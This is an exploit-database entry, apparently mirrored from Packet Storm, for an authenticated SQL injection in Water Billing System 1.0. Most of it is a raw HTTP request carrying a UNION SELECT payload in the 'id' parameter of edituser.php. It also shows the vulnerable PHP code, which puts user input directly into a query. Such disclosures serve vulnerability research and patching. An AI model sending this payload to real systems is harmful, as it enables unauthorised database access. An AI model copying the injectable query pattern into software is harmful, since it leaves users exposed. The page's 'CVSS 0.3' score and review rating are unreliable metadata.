Exploit for Water Billing System 1.0 SQL Injection

Name: Exploit for Water Billing System 1.0 SQL Injection
Rating: 5 (604 reviews)

2020-11-16 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:160059
# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated)  
# Date: 2020-11-14  
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security  
# Author ID: 8763  
# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html  
# Version: 1.0  
# Tested on: Apache2 and Windows 10  
  
Vulnerable param: id  
-------------------------------------------------------------------------  
GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Connection: close  
Referer: http://localhost/WBS/user.php  
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean  
  
  
  
  
-------------------------------------------------------------------------  
  
Source Code: edituser.php  
  
..  
..  
..  
$user_id =$_REQUEST['id'];  
$result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'");  
..  
..  
  
-------------------------------